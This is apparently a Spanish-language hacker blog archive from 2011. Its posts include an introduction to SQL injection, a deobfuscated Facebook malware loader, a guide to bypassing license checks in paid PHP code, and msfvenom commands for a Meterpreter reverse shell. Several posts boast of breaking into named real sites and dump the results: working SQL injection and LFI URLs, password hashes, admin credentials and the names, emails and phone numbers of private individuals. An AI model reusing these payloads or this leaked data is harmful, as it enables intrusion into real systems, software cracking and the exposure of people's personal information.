Bueno, ¿qué es la inyección SQL? Es la vulnerabilidad que se produce cuando te dan un atacante la posibilidad de influir en el Structured Query Language (SQL) que una aplicación pasa a una base de datos back-end. Al ser capaz de influir en lo que se pasa la base de datos, el atacante puede aprovechar la sintaxis SQL y las capacidades de sí mismo, así como el poder y la flexibilidad de soportar la funcionalidad de base de datos y la funcionalidad del sistema operativo a disposición de la base de datos SQL injection no es una vulnerabilidad que afecta exclusivamente a las aplicaciones Web,. ningún código que acepta la entrada de una fuente no confiable y luego usa esa información para formar sentencias de SQL dinámico podría ser vulnerable (por ejemplo, "la grasa del cliente" aplicaciones en una arquitectura cliente / servidor).

Inyección SQL ha existido probablemente desde las bases de datos SQL se conecta primero a las aplicaciones Web. Sin embargo, Puppy Rain Forest es ampliamente reconocido por su descubrimiento -o por lo menos para llevarlo a la atención del público-. El día de Navidad de 1998, Rain Forest Puppy escribió un artículo titulado "NT vulnerabilidades Tecnología Web" de Phrack (http://www.phrack.com/issues.html?issue=54&id=8#article), un e-zine escrito por y para los piratas informáticos. Rain Forest Puppy también lanzó una advertencia sobre la inyección SQL ("How I Packetstorm hackeado", ubicado en www.wiretrip.net/rfp/txt/rfp2k01.txt) a principios de 2000 que detalla cómo la inyección SQL se utiliza para comprometer un popular sitio web . Desde entonces, muchos investigadores han desarrollado y perfeccionado las técnicas para la explotación de inyección de SQL. Sin embargo, hasta el día de muchos desarrolladores y profesionales de la seguridad todavía no lo entienden así.

Visualizar Online

PERSONALIZA TU CUENTA DE FACEBOOK! [FALSO]

2011-09-19T23:59:00.000-07:00

Recordando el malware que se había infiltrado hace algunos meses llamado LA VERDAD DE "QUIEN VISITA MI PERFIL EN FACEBOOK". De nuevo hoy me encuentro con otro que realiza la misma acción, sólo que creo que es más avanzado que el anterior. Vamos a detallarlo,

Primero empezamos con la pagina que contiene el malware(perfaceplus.com), está nos ofrece la capacidad de modificar la vista de nuestro perfil en la red social Facebook, algunos usuarios siguen creyendo que esto es posible, no voy a armar una polémica de que si se puede o no se puede, -aunque para ser sincero, creo que esto es posible y lo tendré en cuenta como proyecto a futuro-, pero en esté caso es un malware.

Como en la entrada de malware anterior, vemos que la técnica de Clickjacking aun sigue en uso. Para este caso sería hacia la pagina facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050, -es sorprendente la cantidad de gente 106.793 que le gusta eso-.

Iniciando con el analisis hacia este malware empezaremos por la pagina principal perfaceplus.com, aquí es donde instalamos unos componentes para si correcta ejecución. Como primer paso tenemos que darle me gusta a facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050.

Después instalar una extensión para firefox -cabe aclarar que este malware es para Facebook y Firefox-, llamada GreaseMonkey, que permite por medio de pequeñas porciones de código creadas por usuarios, modificar el comportamiento de páginas web específicas. (Wikipedia:Greasemonkey).

Continuamente tenemos que acceder a la URL 112021.user.js, que es la porción de código de la que habla la definición de Wikipedia, que cómo siempre esta ofuscada para que el usuario no identifique que es lo que realiza realmente este script. Desofuscando el código quedaría algo como esto:

document['ready'] = start(0);
a = 0;

function start(_0xcdbcx2) {
    var _0xcdbcx3 = document['createElement']('script');
    _0xcdbcx3['type'] = 'text/javascript';
    _0xcdbcx3['src'] = 'http://fbuzz.cdnlapf.tk/jspath.js?' + Math['random']() * 999999;
    document['head']['appendChild'](_0xcdbcx3);
};

De nuevo este escript que lo que hace es añadir la ejecución de un archivo en el head de la pagina, para este caso es jspath.js?.

Ingresando al archivo externo, nos encontramos con lo siguiente,

var thelink1 = "http://content.wuala.com/contents/alexpf25/addon/newengine.js";
var thelink2 = "http://dl.dropbox.com/u/35059217/newengine.js";

function start1(a) {
    var js = document.createElement('script');
    js.type = 'text/javascript';
    js.src = a + '?token=' + Math.random() * 999999;
    js.id = "invoque";
    document.head.appendChild(js);
};
start1(thelink1);

Otra vez realiza lo mismo que el script anterior, sólo que para este caso tenemos dos archivos externos los cuales son alexpf25/addon/newengine.js y 35059217/newengine.js, aquí es donde supongo que esta la funcionalidad como tal del malware.

Curiosamente, leyendo rápidamente me encuentro con lo siguiente, al parecer estan usando como excusa el posible ataque que supuestamente iba a realizar Anonymous contra Facebook.

Facebook está siendo atacado por Anonymous.

Por protección de tu cuenta y tu privacidad, no salgas de Facebook, espera 1 minuto y recarga la página (F5) hasta que el mensaje desaparezca.

Solo eres protegido si tienes FBuzz

Siguiendo con el análisis, pude notar que algo redundante este malware, ejecuta varios archivos que contiene casi la misma funcionalidad. Hay 3 archivos que se ejecutan, los dos anteriores y esté alexpf25/addon/viralizer.js. Creo que tengo fobia al API de Facebook, hace poco quería hacer algo pero nunca pude entenderla, así que hasta aquí llego yo con este analisis. Tendré que estudiarla y verificar de nuevo.

Para solucionar este molesto malware, podemos eliminar el script que insertamos en la extensión de Firefox GreaseMonkey.

CONCLUSIÓN GENERAL: Esto es un Fraude!

[ANOTACIÓN MENTAL] DESOFUSCACIÓN DE CÓDIGO PHP

2011-09-01T14:25:00.000-07:00

Pues para ser sincero, tuve delirios de profesión y no sabia que hacer con mi vida, creo que había pedido la magia de la programación y de la informática. Pero creo que volvió a renacer en mi esta esencia, ya que esto es en lo único que soy bueno. Decidí entonces liberar algunos componentes que desafortunadamente son de pago, y porque no traducirlas a medida de la "crackeo", por así decirlo.

Empece entonces con el componente phpGrid, no daré mucha importancia al funcionamiento, ya que de eso no se trata esta entrada, pero pronto lo verás cuando ya la tenga liberada por completo.

Cuando empece a mirar el código definitivamente lo tome como reto personal, esta como difícil pero no imposible, allí fue donde recorde la canción que dice: "No hay cosas imposibles, sino personas incapaces".

Como lo dije antes, esta entrada es solo como una especie de anotación en algo que no había visto y que quizás puede ayudar a otras personas, que por cierto es un método muy curioso. Dentro de los archivos principales del componente, esta el archivo de nombre phpGrid.php, y después de una tabulación del código tenemos la siguientes lineas un poco más claras que al inicio, pero no es suficiente.

El caso es qué, cuando estaba intentando desofuscar el código que esta en base64 a lineas legibles, no pude hacerlo, simplemente dejaba de funcionar, no tenia sentido si sólo estaba cambiando la cadena ofuscada por la cadena original. Al cabo de unos minutos encontré el problema que simplemente es algo idiota, el siguiente código realiza una busqueda con ayuda de expresiones regulares dentro de la variable $T43D5686285035C13, que tiene el contenido actual del archivo, guardando el número de coincidencias en la variable $T6BBC58A3B5B11DC4.

#
/* ... */
$T43D5686285035C13 = __FILE__;
$T43D5686285035C13 = file_get_contents($T43D5686285035C13);
/* ... */
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
   if (count($T6BBC58A3B5B11DC4)) exit;
   /* ... */
#

Como vemos, después entrará al ciclo y de inmediato en una condición con la variable anterior, haciendo qué, si existen coincidencias paré la ejecución. Ahora para solucionarlo, tenemos que comentariar la linea de esa condición. Eso es todo, si encuentro algo igual de curioso lo estaré publicando o cuando tenga ya el componente liberado.

#OPFACEBOOK ANONYMOUS CONTRA FACEBOOK ¿QUIÉN GANARÁ?

2011-08-12T23:16:00.000-07:00

¿Qué pasa cuándo el puño más duro del mundo se enfrenta al escudo más resistente del mundo? A aquellos que veíais Los Caballeros del Zodiaco siendo niños (y no tan niños), se os habrá dibujado una sonrisa en la cara.

Pues parece ser que en Otoño, vamos a poder ser testigos de una demostración práctica del misterio del puño y el escudo del Dragón.

Facebook, la red social en la que todo el Mundo tiene una cuenta, tiene las horas contadas. Así es, el día 5 de Noviembre es el elegido para destruir Facebook.

Y es que la red social, capaz de permitirnos estar en contacto con amigos de todas las etapas de nuestra vida, así como de consumir gran parte de nuestro valioso tiempo, e incluso generar montones de nuevos casos de addición diariamente, le ha tocado las… le ha entrado por el ojo incorrecto al colectivo Anonymous.

El detonante que ha hecho encender la mecha de la ira de Anonymous ha sido que Facebook ha comenzado a cerrar perfiles y cuentas de grupo de éstos. Asimismo, las "políticas de privacidad de datos" de Facebook (ah, ¿pero Facebook respeta la privacidad de los datos?), así como la supuesta cesión o venta de datos privados por parte de Facebook a entidades gubernamentales, ha contribuido a convocar un hito histórico: Destruir Facebook.

Ya sé que suena a película, de hecho, hasta la fecha elegida para el acto, lo es!

En la película "V de Vendetta", se podía ver a un revolucionario en un supuesto Reino Unido controlado que pretendía atentar en el Parlamento Británico mediante un tren cargado de explosivos. En dicha película, el individuo protegía su anonimato con la popular máscara de Guy Fawkes, rememorando que éste útimo también atentó contra el Parlamento Británico en 1605. En ambos casos, la fecha elegida para el complot de la pólvora era el 5 de Noviembre.

Ahora la pregunta del millón: ¿Cómo piensa Anonymous cepillarse Facebook? ¿Se trata de generar un DDoS una vez más?

La herramienta utilizada para estos fines era LOIC. Actualmente Anonymous cuenta una nueva herramienta, llamada #RefRef, que utilizando Javascript y SQL, es capaz de dejar sin servicio algunos sitios web en pocos segundos. Evidentemente, para que esta herramienta sea efectiva, los sitios web objetivos deben tener cierta vulnerabilidad explotable. De hecho, el sitio Pastebin, ya quedó fuera de combate después de ejecutarse la nueva herramienta durante 17 segundos. Los detalles del funcionamiento de dicha herramienta, deben tener que ver, además de efectuar una gran cantidad de peticiones lícitas por segundo, con alguna vulnerabilidad SQL que permite consultas excesivamente pesadas, y que de forma recurrente y concurrente, desborde la capacidad de los servidores de bases de datos de backend y por tanto, derive en una denegación de servicio.

Ya hemos comentado varias veces que generar un DDoS a según qué infraestructuras no es algo trivial. Incluso a Anonymous (y a no tan anonymous) les resultó imposible "tumbar" la web del PSOE, mediante LOIC, en una de las votaciones para aprobar la ley Sinde, gracias a estar cacheada por Akamai

El tráfico manejado por Facebook diariamente, que sin saber las cifras reales, supongo que debe ser suficiente como para provocar un DDoS a prácticamente cualquier organización, permite adivinar que la infraestructura necesaria para un correcto funcionamiento debe ser el sueño o la pesadilla de un administrador de redes. Así pues, la pregunta de qué cantidad de ancho de banda y/o número de peticiones es necesario para mellar el rendimiento de Facebook, lo sabremos, a modo Record Guiness a partir del 6 de Noviembre.

Sin embargo, el mensaje publicado por Anonymous es que van a "destruir Facebook". Tumbarlo por unas horas, aparte de aumentar la productividad de ciertos trabajadores (¿verdad Susana?), que no les quedaría otra cosa mejor que hacer que serían más productivos, generaría un gran impacto mediático y quedaría en una curiosa historia, pero nada más. Lo preocupante es realmente que Anonymous lo planea DESTRUIR. "Los datos de sus usuarios serán borrados, aunque Facebook los recuperará después". Esto, parece ser que no se trata de un DDoS ya sea con LOIC o #Refref, sino de algo más gordo. ¿Habrán encontrado una vulnerabilidad lo suficientemente crítica que les permita borrar los Petabytes y petabytes que conforman Facebook? ¿Cuánto se tarda en hacer ese gran "rm -rf" o será un "Delete from users"? ¿Se tratará de algún fallo que permita generar bajas de todos los usuarios en cascada? Tendría sentido en ese caso el decir que tirando de backup, Facebook repondrá la información: Recordad que Facebook y su "des-política de des-privacidad" impide que cuando te das de baja se borren tus datos, sino que los guarda por si vuelves.

En cualquier caso, aventurarse a predecir el fin del Mundo (al menos del Mundo Facebook) y ponerle una fecha determinada, basándose en una vulnerabilidad encontrada en Agosto, para ser explotada el día 5 de Noviembre, faltando aún unos 4 meses, también me parecería cuanto menos aventurado, máxime teniendo en cuenta que Facebook es de las empresas que mantiene un programa de gratificaciones para aquellos que encuentren y reporten vulnerabilidades. Si yo fuera Facebook, empezaría pidiéndoles los logs del servidor web a los administradores de PasteBin para decidir si hacer o no el testamento.

Por si acaso el día 4 de Noviembre, me despediré de todos mis contactos Facebook, y si finalmente eso pasa, tendré la excusa para aceptar la invitación a Google+ que aún está en mi lista de To Do.

Si al final, esta campaña se trata de un deseo, una realidad, un órdago, o una estrategia de márketing de Google, como decía un tío mío, "El tiempo lo dirá".

Fuente: securitybydefault.com

INSTITUTO DE EDUCACIÓN TÉCNICA PROFESIONAL [DATA DISCLOSURE]

2011-07-26T23:43:00.000-07:00

BASES DE DATOS:

Current DB: bd_web
[+] information_schema
[+] SAVE
[+] WarGame
[+] bd874b
[+] bd_admin
[+] bd_adminweb
[+] bd_agenda
[+] bd_bienes
[+] bd_chat
[+] bd_comunic
[+] bd_contratos
[+] bd_egresados
[+] bd_fenosa
[+] bd_flisol
[+] bd_geografia
[+] bd_inscr
[+] bd_planeacion
[+] bd_presupuesto
[+] bd_publicacion
[+] bd_publicaciones
[+] bd_quejas
[+] bd_sgc
[+] bd_wargame
[+] bd_web
[+] bd_web_en
[+] ceinfo2
[+] correspondencia
[+] db_kata
[+] eniac
[+] fedeintep
[+] foros
[+] gegar1_intep
[+] intep3d
[+] lpa
[+] moodle
[+] mysql
[+] performance_schema
[+] sistemascsc
[+] test
[+] ventanilla
[+] wargusr
[+] weblogs

INFORMACIÓN DE USUARIOS: WarGame

num_resp	password	usuario	Id_usuario	grupo_usuario
6	f8f41b06b55d33fbf975bc36bdf9e6d4	chilito	1	Chilito
6	6f5fcdd919fb0a919e6a3752f37cd6e5	sistemas_3	2	Sitemas III
6	9f63b1509a6bae0742e3278022fd167d	game_killers	3	Game Killers
6	a2db7088322569de502d0930d62a3365	pkers	4	Pkers
6	20f0b16463f1c64340264fb9a02a51fd	ceres_dovio	5	Ceres El Dovio
4	d83cae1554ce8ed562f6e698f4b2a1ef	sistemas_v	6	Sistemas V
6	d6f682aa58de0aef6ca159c924617e46	experto	7	Menos Experto
6	7ca5f4549b531686d1040999fafd4453	x1nux	8	Elkin Morales
6	b20f9bdd006b91244f4640b619bc0da1	nonone	9	nonone

pass_admin	user_admin	nombers_admin	id_admin
b8923b3cd9109972b56dddebc329650b	webmaster@intep	Juan Manuel Franco	1

[DISCLOSURE] BANCO CENTRAL DE VENEZUELA - HACKED!

2011-07-19T11:35:00.000-07:00

BANCO CENTRAR DE LA REPÚBLICA - BALANCE GENERAL

RESERVAS INTERNACIONALES Y TIPOS DE CAMBIO DE REFERENCIA
TASAS DE INTERÉS ANUALES NOMINALES PROMEDIO PONDERADAS
TIPOS DE CAMBIO DE REFERENCIA
TASA DE INTERÉS APLICABLE AL CÁLCULO DE LOS INTERESES SOBRE PRESTACIONES SOCIALES
INDICE NACIONAL DE PRECIOS AL CONSUMIDOR

SIMPLE PAGE OPTION LFI MODULE JOOMLA

2011-07-15T14:16:00.000-07:00

CÓDIGO VULNERABLE:

$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');

Hace include de lo que llames con ciertos parámetros... La ultima version que es la 1.5.16 y todas las 1.5.x tambien lo son. Se puede resolver facilmente agregandole un str_replace o con permisos de lectura desde el htaccess (este lo recomiendo).

EJEMPLO REAL: http://www.europeancartransport.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email =sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

El NullByte es junto pero blogger no me deja ponerlo el error es en la variable:

spo_site_lang=

Fuente: Seguridad Blanca

AGÜITA PARA MI GENTE! #OWNED!

2011-07-13T22:33:00.000-07:00

TABLAS:

information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLLATION_CHARACTER_SET_APPLICABILITY
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.PROFILING
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLE_PRIVILEGES
information_schema.TRIGGERS
information_schema.USER_PRIVILEGES
information_schema.VIEWS
jbtv.swinf41tblarchivos
jbtv.swinf41tblbanners
jbtv.swinf41tblcategorias
jbtv.swinf41tblcomentarios
jbtv.swinf41tblconsolas
jbtv.swinf41tblcontactos
jbtv.swinf41tbldescargas
jbtv.swinf41tblencuesta
jbtv.swinf41tblmodulos
jbtv.swinf41tblnoticias
jbtv.swinf41tblprogramas
jbtv.swinf41tblrelaciones
jbtv.swinf41tblrespuestas
jbtv.swinf41tblshows
jbtv.swinf41tblsitiosvisitados
jbtv.swinf41tblusuarios
jbtv.swinf41tblvideos

Tabla: jbtv.swinf41tblusuarios

idusuario
strnombre
strcargo
strlogin
strclave
idactivo
idperfil
dsfoto
dsprof
dscom
dscorreo
idusuario
strnombre
strcargo
strlogin
strclave
idactivo
idperfil
dsfoto
dsprof
dscom
dscorreo
id
seccion
campo1
campo2
campo3
campo4
campo5
campo6
campo8
tipo
tema
activar
intpos

MILES DE DATOS CIUDADANOS DE BOGOTA

2011-07-12T22:14:00.000-07:00

INSCRITOS SENA 2009-2010.pdf - 186 Registros
2007-2008.xls - 998 Registros
2007_2009.xls - 998 Registros
01 personas vinculadas a capacitacion junio 2007 a junio 2008.xlsx - 4121 Registros
02 personas vinculadas a capacitacion julio 2008 a julio 2009.xlsx - 1635 Registros
03 personas vinculadas a capacitacion agosto a diciembre 2009.xlsx - 44 Registros
Representantes REDEP.xls

METASPLOIT MSFVenom

2011-07-08T16:36:00.000-07:00

$ ./msfvenom

Hace unas semanas, durante una de mis actualizaciones del Metasploit Framework ví aparecer un nuevo comando llamado "msfvenom". No había leído nada en el blog de Metasploit ni en ningún otro lado, pero con ese nombre tenía que ser algo bueno, así que miré la ayuda del comando a ver si averiguaba que hacía el nuevo jueguete:

$ ./msfvenom --help

Visto lo visto, y después de jugar un rato, podemos decir que "msfvenom" simplemente es una unificación de los binarios "msfpayload" y "msfencode" que todos hemos utilizado para generar payloads de Metasploit para que funcionen de forma independiente, o para importarlos en nuestros exploits fuera del framework, y cifrarlo.

Por hacer un repaso, hasta ahora, si quisiéramo generar un Payload de tipo Meterpreter para Windows y encodearlo con 10 iteraciones de alguno de los algoritmos, tendríamos que llamar a msfpayload señalando la salida como Raw, y concatenar esta con msfencode:

#
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -o meterpreter.exe
#

Ahora, con el nuevo comando, sería lo mismo, pero sin tener que usar tuberías ni elegir formato Raw primero:

#
$ ./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 LHOST=192.168.1.100 > meterpreter.exe
#

Por lo demás, usaríamos este binario de su forma habitual, y por supuesto tiene muchas más opciones para elegir patrones diferentes para crear los binarios, igual que sucedía con "msfpayload" y "msfencode".

Fuente: Pentester.es

iSQL en contraloriadelatlantico.gov.co

2011-07-08T11:58:00.000-07:00

Contraloria Departamental del Atlantico

Tablas:

titulares 
resoluciones 
portada 
novedades 
noticias 
normatividad 
municipios 
modalidad 
juiciosderesponsabilidad 
invitaciones 
galeria 
gal_titulos 
entidad 
cursos 
cotizaciones 
controles 
contratos 
contenido 
clase_contrato 
cda_sesiones 
auditorias

Tabla: cda_sesiones.

IP	FechaHora	ID_Usuario	ID_Session
186.121.45.219	2010-04-26 09:58:03	1	12
186.121.45.219	2010-04-26 10:17:05	1	13
186.121.45.219	2010-04-26 10:25:14	1	14
186.121.45.219	2010-04-26 10:56:59	1	15
186.121.45.219	2010-04-27 09:42:06	1	16
186.121.45.219	2010-04-27 10:03:04	1	17
186.121.45.219	2010-04-27 10:25:25	1	18
186.121.45.219	2010-04-27 10:31:26	1	19
186.121.45.219	2010-04-27 09:58:35	1	20
186.121.45.219	2010-04-28 06:30:35	1	21
Dynamic-IP-1868118132.cable.net.co	2010-04-29 05:42:08	1	22
186.121.45.219	2010-04-29 06:19:24	1	23
186.121.45.219	2010-04-29 02:09:55	1	24
186.121.45.219	2010-05-27 08:06:22	1	25
186.121.45.219	2010-06-24 04:11:23	1	26
186.121.45.219	2010-06-30 10:11:55	1	27

iSQL en metrolinea.gov.co

2011-07-08T11:45:00.000-07:00

Sistema de trasporte masivo de Bucaramanga y su Área metropolitana

Tablas:

usuarios 
tipovehiculo 
tipousuario 
ruta 
relusuariosruta 
relusuarioshorarioruta 
paginasamigas 
pagina 
ocupacion 
noticiasninos 
noticiashome 
noticias 
modulos 
metrocam 
ipencuestas 
institucional 
imagenesninos 
imagenesmedioamb 
imagenesbanner 
horarioruta 
historial 
glosario 
fotos 
fondopagina 
faq 
documentos 
cuestionariorespuesta 
cuestionario 
contactenos 
cargo 
boletin 
banner 
asunto 
album 
Respuesta
Pregunta

Tabla: usuarios

admincsv info@intelconex.com 6345850  Conexiones Inteligentes S.A.S.
JMedina sistemas@metrolinea.gov.co 6430807 ext 119 3175416747 Jorge Medina Perez
cgarcia@metrolinea.gov.co 6992275 315 7823264 Clara In�s Garc�a Monsalve
castricoliliana@gmail.com 6433865 3188044148 Liliana Patricia Castro Carre�o
camanpulido@hotmail.com  3184861388 Camilo Andr�s Pulido Rey
gmb_17@hotmail.com 6913895 3003776952 Gerson Martinez Baena
plata_rey@hotmail.com  3158746513 Maria Elizabeth Plata Rey
gabo_1996@hotmail.com 6552758 3155140757 gabriel leonardo ortiz vargas
fannyelieth713@yahoo.es  3185255894 fanny elieth ni�o castellanos
fabianamad@hotmail.com  3204470624 EDUARD FABIAN MAZO AMADO
alejandra lizcano
eernesto12@hotmail.com 6324586 3124262670 edwin ernesto martinez parra
eernesto12@hotmail.com 6324586 3124262670 edwin ernesto martinez parra
mandrevas@hotmail.com 3167581288 3167581288 marco andres vasquez mendez
americadecali82@hotmail.com 3005760345 3005760345 Julian Andres Sedano Duarte
jairmezadg@hotmail.com  3187148600 Jair Fernando Mesa Romero
nicolas_bernal@hotmail.com 6832638 3002071431 Juan Nicolas Bernal Yhama
odavidcastellanos_1015@hotmail.com 3186410181 3186410181 Omar David Castellanos Herrera
ortizsa@live.com 6991776 3123760884 SERGIO AUGUSTO ORTIZ BARRAZA
jack2011_@hotmail.com 6192138 3202068145 jairo andres correa gomez
disturbio19@hotmail.com 6427860-6449008  SERGIO ENRIQUE MENDEZ FERNANDEZ
andrerev@gmail.com 6360620 3172130873 N�colas Andr� Dur�n Garz�n
damianikus@hotmail.com 6576942 3104806325 damian julian
zulianny622@hotmail.com 6470584 3187284840 zulema arengas
BETO8689@HOTMAIL.COM  3143106711 LUIS ALBERTO ALDANA PORTILLA
j-ricardo1995@hotmail.com 6491506 3172553554 jhojan ricardo pinto rincon
cris1214_6@hotmail.com 6913173 3175310775 cristian serrano
milago0874@gmail.com 6323024 3164677976 Eduard Milander Gomez Ayala
acened1@gmail.com 6460413 3204289580 Acened Mancilla Ruiz
isaijaimes@hotmail.com 6585210 3162961403 isai jaimes sepulveda
cecilia8910@gmail.com 639-26-59 317-815-0228 CILIA DEL ROSARIO TORRES DE JIMENEZ
emirey3020@hotmail.com 6585210 3168211456 emilce jaimes sepulveda
wasr.el.loko@gmail.com  3188878518 Wuilfret Arpidio Sanchez Ramirez
carlld12@hotmail.com  3173911253 Carlos Diaz
agusflo2009@hotmail.com 6499970 3163276062 AGUSTIN DEMETRIO FLOREZ ESCALANTE
marloncobain@msn.com  3167695026 Marlon H. Correa Ardila

Curaduría urbana de Bogota HACKED!

2011-07-08T00:38:00.000-07:00

Sin nada que hacer y la perra de @Progressive-Death OFF, me puse a mirar algunas cosas en la Internet y me tope con esta pagina, después de algunos testeos básicos que suelo hacer, me doy cuenta que es vulnerable a inyección de código SQL, así que intento sacarle provecho a ver que información encuentro, pero ocurre un problema, -jamás en mi vida había estado de frente con este error-, no se porque mierda salia

#
Error: Illegal mix of collations for operation 'UNION'
#

Entonces me pongo a buscar y pensando en la frase que todos dicen, -cada día se aprende algo diferente-, encuentro la solución, os la explicaré.

Porque suele aparecer este error?

Sintácticamente la consulta que hemos realizado es correcta, pero problema esta en el tipo de codificación que se encuentra en el motor de base de datos, el cual intentar comparar dos cadenas codificadas con diferente juego de caracteres.

Solución,

Basta sólo con convertir nuestra cadena inyectada a la misma que se encuentra en uso por el motor de base de datos, en nuestro caso sería:
#
[...] CONVERT(table_name USING latin1) [...]
#
Con esta conversión ya podemos printear las tablas.

Como quiero automatizar todo, -me da pereza hacerlo manuelmente-, me puse a buscar algo que realizará esta tarea rapidamente, y me encontre con la web scan.subhashdasyam.com/dumper.php, que permite realizar un dumpeo de datos con tan sólo ingresar correctamente los parámetros de la inyección -no entraré en detalle sobre el uso de esta herramienta-.

Os dejaré un ejemplo de como use esta herramienta para que vea como es la configuración de los parámetros.

#
http://www.curaduria1bogota.com/noticias.php?cat_id=-1+UNION+ALL+SELECT+1,concat(0x7375626861736864617379616d2e636f6d,CONVERT(id+USING+latin1),0x3a,CONVERT(nombre+USING+latin1),0x3a,CONVERT(login+USING+latin1),0x3a,CONVERT(pwd+USING+latin1),0x3a,CONVERT(email+USING+latin1),0x3a,CONVERT(estado+USING+latin1),0x7375626861736864617379616d2e636f6d),3+FROM+seg_usuarios+limit+
#

El resultado es:

#
1:Administrador:123456:123456:diazpernial@yahoo.com:A
#

A ver si alguna vez te encuentro ON @Progressive-Death, siempre te pierdes.

Feliz HACK!